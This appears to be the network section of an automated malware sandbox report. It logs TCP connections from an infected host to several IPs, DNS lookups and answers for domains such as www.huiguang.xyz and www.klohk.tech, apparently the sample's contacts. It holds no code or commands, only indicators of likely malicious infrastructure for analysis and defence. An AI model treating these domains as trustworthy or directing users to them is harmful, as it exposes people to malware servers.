                                                                  Nov 22, 2024 14:45:27.642143965 CET4971580192.168.2.8203.161.49.193
                                                                  Nov 22, 2024 14:45:28.697917938 CET4971680192.168.2.8203.161.49.193
                                                                  Nov 22, 2024 14:45:28.817729950 CET8049716203.161.49.193192.168.2.8
                                                                  Nov 22, 2024 14:45:28.817909002 CET4971680192.168.2.8203.161.49.193
                                                                  Nov 22, 2024 14:45:28.842729092 CET4971680192.168.2.8203.161.49.193
                                                                  Nov 22, 2024 14:45:28.962469101 CET8049716203.161.49.193192.168.2.8
                                                                  Nov 22, 2024 14:45:30.073261023 CET8049716203.161.49.193192.168.2.8
                                                                  Nov 22, 2024 14:45:30.073277950 CET8049716203.161.49.193192.168.2.8
                                                                  Nov 22, 2024 14:45:30.073486090 CET4971680192.168.2.8203.161.49.193
                                                                  Nov 22, 2024 14:45:30.082729101 CET4971680192.168.2.8203.161.49.193
                                                                  Nov 22, 2024 14:45:30.202449083 CET8049716203.161.49.193192.168.2.8
                                                                  Nov 22, 2024 14:45:35.608947992 CET4971780192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:35.732158899 CET80497173.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:35.732254982 CET4971780192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:35.744465113 CET4971780192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:35.864556074 CET80497173.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:36.965468884 CET80497173.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:36.965532064 CET4971780192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:37.251415968 CET4971780192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:37.371037006 CET80497173.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:38.270577908 CET4971880192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:38.390295982 CET80497183.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:38.390487909 CET4971880192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:38.399326086 CET4971880192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:38.519227982 CET80497183.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:39.557591915 CET80497183.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:39.557692051 CET4971880192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:39.907680988 CET4971880192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:40.027270079 CET80497183.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:40.926944017 CET4971980192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:41.046679020 CET80497193.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:41.049298048 CET4971980192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:41.062104940 CET4971980192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:41.181890965 CET80497193.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:41.181915045 CET80497193.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:42.145050049 CET80497193.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:42.145119905 CET4971980192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:42.564510107 CET4971980192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:42.684248924 CET80497193.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:43.583056927 CET4972080192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:43.702749014 CET80497203.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:43.702922106 CET4972080192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:43.709770918 CET4972080192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:43.830696106 CET80497203.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:44.801428080 CET80497203.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:44.801467896 CET80497203.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:44.801630974 CET4972080192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:44.804248095 CET4972080192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:44.928148031 CET80497203.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:50.525703907 CET4972180192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:50.645358086 CET80497213.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:50.645565033 CET4972180192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:50.654340029 CET4972180192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:50.777194977 CET80497213.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:51.749124050 CET80497213.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:51.749223948 CET4972180192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:52.158586979 CET4972180192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:52.279269934 CET80497213.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:53.200910091 CET4972280192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:53.320703983 CET80497223.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:53.320842981 CET4972280192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:53.367153883 CET4972280192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:53.487152100 CET80497223.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:54.510565996 CET80497223.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:54.510679007 CET4972280192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:54.876415014 CET4972280192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:54.997056961 CET80497223.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:55.895447969 CET4972380192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:56.015615940 CET80497233.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:56.016102076 CET4972380192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:56.025079966 CET4972380192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:56.148356915 CET80497233.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:56.148416996 CET80497233.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:57.209455967 CET80497233.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:57.209645033 CET4972380192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:57.532665014 CET4972380192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:57.652303934 CET80497233.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:58.553682089 CET4972480192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:58.673372030 CET80497243.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:58.673460960 CET4972480192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:58.682178974 CET4972480192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:58.802165031 CET80497243.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:59.907481909 CET80497243.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:59.907497883 CET80497243.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:45:59.907702923 CET4972480192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:45:59.911556959 CET4972480192.168.2.83.33.130.190
                                                                  Nov 22, 2024 14:46:00.031241894 CET80497243.33.130.190192.168.2.8
                                                                  Nov 22, 2024 14:46:05.505717993 CET4972580192.168.2.8198.252.98.54
                                                                  Nov 22, 2024 14:46:05.625442982 CET8049725198.252.98.54192.168.2.8
                                                                  Nov 22, 2024 14:46:05.625533104 CET4972580192.168.2.8198.252.98.54
                                                                  Nov 22, 2024 14:46:05.637442112 CET4972580192.168.2.8198.252.98.54
                                                                  Nov 22, 2024 14:46:05.757121086 CET8049725198.252.98.54192.168.2.8
                                                                  Nov 22, 2024 14:46:06.938314915 CET8049725198.252.98.54192.168.2.8
                                                                  Nov 22, 2024 14:46:06.938333988 CET8049725198.252.98.54192.168.2.8
                                                                  Nov 22, 2024 14:46:06.938462973 CET4972580192.168.2.8198.252.98.54
                                                                  Nov 22, 2024 14:46:07.142316103 CET4972580192.168.2.8198.252.98.54
                                                                  Nov 22, 2024 14:46:08.161606073 CET4972680192.168.2.8198.252.98.54
                                                                  Nov 22, 2024 14:46:08.281200886 CET8049726198.252.98.54192.168.2.8
                                                                  Nov 22, 2024 14:46:08.281480074 CET4972680192.168.2.8198.252.98.54
                                                                  Nov 22, 2024 14:46:08.293920994 CET4972680192.168.2.8198.252.98.54
                                                                  Nov 22, 2024 14:46:08.413511038 CET8049726198.252.98.54192.168.2.8
                                                                  Nov 22, 2024 14:46:09.548312902 CET8049726198.252.98.54192.168.2.8
                                                                  Nov 22, 2024 14:46:09.548413038 CET8049726198.252.98.54192.168.2.8
                                                                  Nov 22, 2024 14:46:09.548475027 CET4972680192.168.2.8198.252.98.54
                                                                  Nov 22, 2024 14:46:09.798337936 CET4972680192.168.2.8198.252.98.54
                                                                  Nov 22, 2024 14:46:10.816610098 CET4972780192.168.2.8198.252.98.54
                                                                  Nov 22, 2024 14:46:10.936160088 CET8049727198.252.98.54192.168.2.8
                                                                  Nov 22, 2024 14:46:10.936403036 CET4972780192.168.2.8198.252.98.54
                                                                  Nov 22, 2024 14:46:10.945439100 CET4972780192.168.2.8198.252.98.54
                                                                  Nov 22, 2024 14:46:11.065754890 CET8049727198.252.98.54192.168.2.8
                                                                  Nov 22, 2024 14:46:11.065810919 CET8049727198.252.98.54192.168.2.8
                                                                  Nov 22, 2024 14:46:12.157075882 CET8049727198.252.98.54192.168.2.8
                                                                  Nov 22, 2024 14:46:12.157130003 CET8049727198.252.98.54192.168.2.8
                                                                  Nov 22, 2024 14:46:12.157215118 CET4972780192.168.2.8198.252.98.54
                                                                  Nov 22, 2024 14:46:12.454662085 CET4972780192.168.2.8198.252.98.54
                                                                  Nov 22, 2024 14:46:13.473866940 CET4972880192.168.2.8198.252.98.54
                                                                  Nov 22, 2024 14:46:13.593575954 CET8049728198.252.98.54192.168.2.8
                                                                  Nov 22, 2024 14:46:13.593729019 CET4972880192.168.2.8198.252.98.54
                                                                  Nov 22, 2024 14:46:13.601231098 CET4972880192.168.2.8198.252.98.54
                                                                  Nov 22, 2024 14:46:13.721007109 CET8049728198.252.98.54192.168.2.8
                                                                  Nov 22, 2024 14:46:14.897952080 CET8049728198.252.98.54192.168.2.8
                                                                  Nov 22, 2024 14:46:14.897975922 CET8049728198.252.98.54192.168.2.8
                                                                  Nov 22, 2024 14:46:14.898190022 CET4972880192.168.2.8198.252.98.54
                                                                  Nov 22, 2024 14:46:14.901071072 CET4972880192.168.2.8198.252.98.54
                                                                  Nov 22, 2024 14:46:15.020648956 CET8049728198.252.98.54192.168.2.8
                                                                  Nov 22, 2024 14:46:21.093620062 CET4972980192.168.2.8103.224.182.242
                                                                  Nov 22, 2024 14:46:21.213851929 CET8049729103.224.182.242192.168.2.8
                                                                  Nov 22, 2024 14:46:21.213979006 CET4972980192.168.2.8103.224.182.242
                                                                  Nov 22, 2024 14:46:21.224944115 CET4972980192.168.2.8103.224.182.242
                                                                  Nov 22, 2024 14:46:21.346292019 CET8049729103.224.182.242192.168.2.8
                                                                  Nov 22, 2024 14:46:22.583301067 CET8049729103.224.182.242192.168.2.8
                                                                  Nov 22, 2024 14:46:22.583431959 CET8049729103.224.182.242192.168.2.8
                                                                  Nov 22, 2024 14:46:22.583498001 CET4972980192.168.2.8103.224.182.242
                                                                  Nov 22, 2024 14:46:22.735939026 CET4972980192.168.2.8103.224.182.242
                                                                  Nov 22, 2024 14:46:23.754286051 CET4973080192.168.2.8103.224.182.242
                                                                  Nov 22, 2024 14:46:23.873990059 CET8049730103.224.182.242192.168.2.8
                                                                  Nov 22, 2024 14:46:23.874175072 CET4973080192.168.2.8103.224.182.242
                                                                  Nov 22, 2024 14:46:23.882862091 CET4973080192.168.2.8103.224.182.242
                                                                  Nov 22, 2024 14:46:24.002579927 CET8049730103.224.182.242192.168.2.8
                                                                  Nov 22, 2024 14:46:25.163870096 CET8049730103.224.182.242192.168.2.8
                                                                  Nov 22, 2024 14:46:25.163908958 CET8049730103.224.182.242192.168.2.8
                                                                  Nov 22, 2024 14:46:25.163976908 CET4973080192.168.2.8103.224.182.242
                                                                  Nov 22, 2024 14:46:25.392149925 CET4973080192.168.2.8103.224.182.242
                                                                  Nov 22, 2024 14:46:26.415712118 CET4973180192.168.2.8103.224.182.242
                                                                  Nov 22, 2024 14:46:26.535427094 CET8049731103.224.182.242192.168.2.8
                                                                  Nov 22, 2024 14:46:26.535561085 CET4973180192.168.2.8103.224.182.242
                                                                  Nov 22, 2024 14:46:26.546710014 CET4973180192.168.2.8103.224.182.242
                                                                  Nov 22, 2024 14:46:26.666501999 CET8049731103.224.182.242192.168.2.8
                                                                  Nov 22, 2024 14:46:26.666523933 CET8049731103.224.182.242192.168.2.8
                                                                  Nov 22, 2024 14:46:27.865304947 CET8049731103.224.182.242192.168.2.8
                                                                  Nov 22, 2024 14:46:27.865339994 CET8049731103.224.182.242192.168.2.8
                                                                  Nov 22, 2024 14:46:27.865597963 CET4973180192.168.2.8103.224.182.242
                                                                  Nov 22, 2024 14:46:28.048391104 CET4973180192.168.2.8103.224.182.242
                                                                  Nov 22, 2024 14:46:29.067111015 CET4973280192.168.2.8103.224.182.242
                                                                  Nov 22, 2024 14:46:29.186753035 CET8049732103.224.182.242192.168.2.8
                                                                  Nov 22, 2024 14:46:29.187056065 CET4973280192.168.2.8103.224.182.242
                                                                  Nov 22, 2024 14:46:29.195655107 CET4973280192.168.2.8103.224.182.242
                                                                  Nov 22, 2024 14:46:29.315335989 CET8049732103.224.182.242192.168.2.8
                                                                  Nov 22, 2024 14:46:30.465423107 CET8049732103.224.182.242192.168.2.8
                                                                  Nov 22, 2024 14:46:30.465539932 CET8049732103.224.182.242192.168.2.8
                                                                  Nov 22, 2024 14:46:30.465574026 CET8049732103.224.182.242192.168.2.8
                                                                  Nov 22, 2024 14:46:30.465806007 CET4973280192.168.2.8103.224.182.242
                                                                  Nov 22, 2024 14:46:30.465806007 CET4973280192.168.2.8103.224.182.242
                                                                  Nov 22, 2024 14:46:30.468641996 CET4973280192.168.2.8103.224.182.242
                                                                  Nov 22, 2024 14:46:30.588252068 CET8049732103.224.182.242192.168.2.8
                                                                  Nov 22, 2024 14:46:36.397830009 CET4973380192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:36.517748117 CET8049733154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:36.517867088 CET4973380192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:36.529112101 CET4973380192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:36.649667025 CET8049733154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:38.032784939 CET4973380192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:38.089654922 CET8049733154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:38.089787006 CET8049733154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:38.089967966 CET4973380192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:38.089967966 CET4973380192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:38.152295113 CET8049733154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:38.152499914 CET4973380192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:39.052858114 CET4973480192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:39.172796965 CET8049734154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:39.173837900 CET4973480192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:39.191097975 CET4973480192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:39.310872078 CET8049734154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:40.704853058 CET4973480192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:40.800514936 CET8049734154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:40.800586939 CET4973480192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:40.800592899 CET8049734154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:40.800643921 CET4973480192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:40.824551105 CET8049734154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:40.824655056 CET4973480192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:41.723628998 CET4973580192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:41.843556881 CET8049735154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:41.843712091 CET4973580192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:41.854500055 CET4973580192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:41.974706888 CET8049735154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:41.974757910 CET8049735154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:43.360922098 CET4973580192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:43.418164968 CET8049735154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:43.418289900 CET8049735154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:43.418308973 CET4973580192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:43.418380976 CET4973580192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:43.480703115 CET8049735154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:43.480992079 CET4973580192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:44.380143881 CET4973680192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:44.500030041 CET8049736154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:44.500372887 CET4973680192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:44.510334969 CET4973680192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:44.630093098 CET8049736154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:46.132545948 CET8049736154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:46.133691072 CET8049736154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:46.133779049 CET4973680192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:46.136298895 CET4973680192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:46.258049965 CET8049736154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:51.622291088 CET4973780192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:51.741992950 CET804973731.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:51.742105961 CET4973780192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:51.763345957 CET4973780192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:51.883060932 CET804973731.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:53.207158089 CET804973731.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:53.207422972 CET804973731.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:53.207473040 CET4973780192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:53.267179012 CET4973780192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:54.337866068 CET4973880192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:54.457833052 CET804973831.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:54.458028078 CET4973880192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:54.531384945 CET4973880192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:54.651120901 CET804973831.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:55.800420046 CET804973831.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:55.800457001 CET804973831.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:55.800508022 CET4973880192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:56.032860994 CET4973880192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:57.140054941 CET4973980192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:57.259859085 CET804973931.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:57.259948015 CET4973980192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:57.324260950 CET4973980192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:57.444437027 CET804973931.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:57.444493055 CET804973931.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:58.697161913 CET804973931.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:58.697194099 CET804973931.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:58.697237015 CET4973980192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:58.830005884 CET4973980192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:59.849550009 CET4974080192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:59.969391108 CET804974031.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:59.969542980 CET4974080192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:47:00.031788111 CET4974080192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:47:00.151639938 CET804974031.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:47:01.304291010 CET804974031.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:47:01.304357052 CET804974031.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:47:01.304687977 CET4974080192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:47:01.308343887 CET4974080192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:47:01.428591967 CET804974031.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:47:07.122124910 CET4974180192.168.2.864.190.63.222
                                                                  Nov 22, 2024 14:47:07.241974115 CET804974164.190.63.222192.168.2.8
                                                                  Nov 22, 2024 14:47:07.242198944 CET4974180192.168.2.864.190.63.222
                                                                  Nov 22, 2024 14:47:07.265989065 CET4974180192.168.2.864.190.63.222
                                                                  Nov 22, 2024 14:47:07.385935068 CET804974164.190.63.222192.168.2.8
                                                                  Nov 22, 2024 14:47:08.567526102 CET804974164.190.63.222192.168.2.8
                                                                  Nov 22, 2024 14:47:08.567559958 CET804974164.190.63.222192.168.2.8
                                                                  Nov 22, 2024 14:47:08.567712069 CET4974180192.168.2.864.190.63.222
                                                                  Nov 22, 2024 14:47:08.783128977 CET4974180192.168.2.864.190.63.222
                                                                  Nov 22, 2024 14:47:10.303333044 CET4974280192.168.2.864.190.63.222
                                                                  Nov 22, 2024 14:47:10.423293114 CET804974264.190.63.222192.168.2.8
                                                                  Nov 22, 2024 14:47:10.423525095 CET4974280192.168.2.864.190.63.222
                                                                  Nov 22, 2024 14:47:10.438092947 CET4974280192.168.2.864.190.63.222
                                                                  Nov 22, 2024 14:47:10.557813883 CET804974264.190.63.222192.168.2.8
                                                                  Nov 22, 2024 14:47:11.826364040 CET804974264.190.63.222192.168.2.8
                                                                  Nov 22, 2024 14:47:11.826395988 CET804974264.190.63.222192.168.2.8
                                                                  Nov 22, 2024 14:47:11.826466084 CET4974280192.168.2.864.190.63.222

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 22, 2024 14:44:47.325644016 CET5294653192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:44:48.163919926 CET53529461.1.1.1192.168.2.8
                                                                  Nov 22, 2024 14:45:04.924666882 CET6499553192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:45:05.734055996 CET53649951.1.1.1192.168.2.8
                                                                  Nov 22, 2024 14:45:20.069087982 CET4991653192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:45:20.638358116 CET53499161.1.1.1192.168.2.8
                                                                  Nov 22, 2024 14:45:35.100126982 CET5038853192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:45:35.605865002 CET53503881.1.1.1192.168.2.8
                                                                  Nov 22, 2024 14:45:49.819225073 CET6131153192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:45:50.522162914 CET53613111.1.1.1192.168.2.8
                                                                  Nov 22, 2024 14:46:04.927434921 CET5268453192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:46:05.502995014 CET53526841.1.1.1192.168.2.8
                                                                  Nov 22, 2024 14:46:19.911709070 CET6362953192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:46:20.907830954 CET6362953192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:46:21.085772991 CET53636291.1.1.1192.168.2.8
                                                                  Nov 22, 2024 14:46:21.085828066 CET53636291.1.1.1192.168.2.8
                                                                  Nov 22, 2024 14:46:35.476583004 CET5090853192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:46:36.395114899 CET53509081.1.1.1192.168.2.8
                                                                  Nov 22, 2024 14:46:51.145904064 CET6407453192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:46:51.616297960 CET53640741.1.1.1192.168.2.8
                                                                  Nov 22, 2024 14:47:06.391652107 CET5190753192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:47:07.115411043 CET53519071.1.1.1192.168.2.8

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Nov 22, 2024 14:44:47.325644016 CET192.168.2.81.1.1.10xf093Standard query (0)www.huiguang.xyzA (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:45:04.924666882 CET192.168.2.81.1.1.10x6b59Standard query (0)www.beingandbecoming.ltdA (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:45:20.069087982 CET192.168.2.81.1.1.10xb05eStandard query (0)www.futurevision.lifeA (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:45:35.100126982 CET192.168.2.81.1.1.10xdca5Standard query (0)www.schedulemassage.xyzA (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:45:49.819225073 CET192.168.2.81.1.1.10x9edeStandard query (0)www.mcfunding.orgA (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:46:04.927434921 CET192.168.2.81.1.1.10x4222Standard query (0)www.migorengya8.clickA (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:46:19.911709070 CET192.168.2.81.1.1.10x922fStandard query (0)www.klohk.techA (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:46:20.907830954 CET192.168.2.81.1.1.10x922fStandard query (0)www.klohk.techA (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:46:35.476583004 CET192.168.2.81.1.1.10x3309Standard query (0)www.d63dm.topA (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:46:51.145904064 CET192.168.2.81.1.1.10x7ce7Standard query (0)www.servannto.siteA (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:47:06.391652107 CET192.168.2.81.1.1.10x8f86Standard query (0)www.telforce.oneA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Nov 22, 2024 14:44:48.163919926 CET1.1.1.1192.168.2.80xf093No error (0)www.huiguang.xyz154.216.76.80A (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:45:05.734055996 CET1.1.1.1192.168.2.80x6b59No error (0)www.beingandbecoming.ltdbeingandbecoming.ltdCNAME (Canonical name)IN (0x0001)false
                                                                  Nov 22, 2024 14:45:05.734055996 CET1.1.1.1192.168.2.80x6b59No error (0)beingandbecoming.ltd3.33.130.190A (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:45:05.734055996 CET1.1.1.1192.168.2.80x6b59No error (0)beingandbecoming.ltd15.197.148.33A (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:45:20.638358116 CET1.1.1.1192.168.2.80xb05eNo error (0)www.futurevision.life203.161.49.193A (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:45:35.605865002 CET1.1.1.1192.168.2.80xdca5No error (0)www.schedulemassage.xyzschedulemassage.xyzCNAME (Canonical name)IN (0x0001)false
                                                                  Nov 22, 2024 14:45:35.605865002 CET1.1.1.1192.168.2.80xdca5No error (0)schedulemassage.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:45:35.605865002 CET1.1.1.1192.168.2.80xdca5No error (0)schedulemassage.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:45:50.522162914 CET1.1.1.1192.168.2.80x9edeNo error (0)www.mcfunding.orgmcfunding.orgCNAME (Canonical name)IN (0x0001)false
                                                                  Nov 22, 2024 14:45:50.522162914 CET1.1.1.1192.168.2.80x9edeNo error (0)mcfunding.org3.33.130.190A (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:45:50.522162914 CET1.1.1.1192.168.2.80x9edeNo error (0)mcfunding.org15.197.148.33A (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:46:05.502995014 CET1.1.1.1192.168.2.80x4222No error (0)www.migorengya8.clickmigorengya8.clickCNAME (Canonical name)IN (0x0001)false
                                                                  Nov 22, 2024 14:46:05.502995014 CET1.1.1.1192.168.2.80x4222No error (0)migorengya8.click198.252.98.54A (IP address)IN (0x0001)false
